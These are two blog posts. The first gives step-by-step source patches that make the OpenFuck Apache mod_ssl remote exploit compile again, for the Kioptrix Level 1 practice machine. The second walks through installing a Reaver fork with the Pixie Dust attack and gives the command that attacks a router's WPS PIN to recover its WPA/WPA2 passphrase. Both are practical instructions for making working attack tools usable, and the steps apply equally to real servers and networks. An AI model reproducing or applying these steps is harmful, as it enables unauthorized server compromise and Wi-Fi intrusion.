Sunday, August 5, 2018

Updating the OpenFuck exploit if you are getting an SSL error

Kioptrix Level 1 - Error while compiling the OpenFuck exploit, solved

Hello guys. I got an error while compiling the OpenFuck exploit, even after updating it according to this blog post: http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. I still got an SSL error like the one in the screenshot.

I googled a bit to solve this error. Follow the steps carefully.

Step 1 - First update your exploit according to this blog post:
http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/

Step 2 - Now add these lines at line 24:

/* SSLv2 message-type constants; newer OpenSSL headers no longer define them */
#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16

Step 3 - At line 1078, replace if (pkey->type != EVP_PKEY_RSA) with

if (EVP_PKEY_get1_RSA(pkey) == NULL)

Step 4 - Go to line 1084 and replace pkey->pkey.rsa with EVP_PKEY_get1_RSA(pkey)

Hope this helps you out if you got stuck with this exploit. Cheers!

Wednesday, December 21, 2016

Installation of modified Reaver with Pixie Dust

Hello guys.
Today I am going to show you how to install the modified Reaver, which includes the Pixie Dust attack.

About Reaver

Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a wide variety of access points and WPS implementations.
The original Reaver implements an online brute-force attack against WPS PINs, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf. reaver-wps-fork-t6x is a community fork which includes various bug fixes and an additional attack method (the offline Pixie Dust attack).
Depending on the target access point (AP), the average time to recover the plain-text WPA/WPA2 passphrase with the traditional online brute-force method is between 4 and 10 hours. In practice, it will generally take half this time to guess the correct WPS PIN and recover the passphrase. With the offline attack, if the AP is vulnerable, it may take only seconds to minutes.

Installation

Step 1: Type in the terminal
"apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps"

Step 2: Go to this link: "https://github.com/t6x/reaver-wps-fork-t6x"

Step 3: Now type in the terminal "git clone https://github.com/t6x/reaver-wps-fork-t6x"

Step 4: Type in the terminal "cd reaver-wps-fork-t6x/"

Step 5: Type in the terminal "cd src/"

Step 6: Type in the terminal "./configure"

Step 7: Type in the terminal "make"

Step 8: Type in the terminal "make install"

That's all guys ;-) You are ready to launch Reaver. To use pixiewps,

type "reaver -i (interface) -b (BSSID) -c (channel) -vvv -K 1"

where  -i   : interface in monitor mode
       -b   : BSSID
       -c   : current channel of the BSSID
       -K 1 : launch pixiewps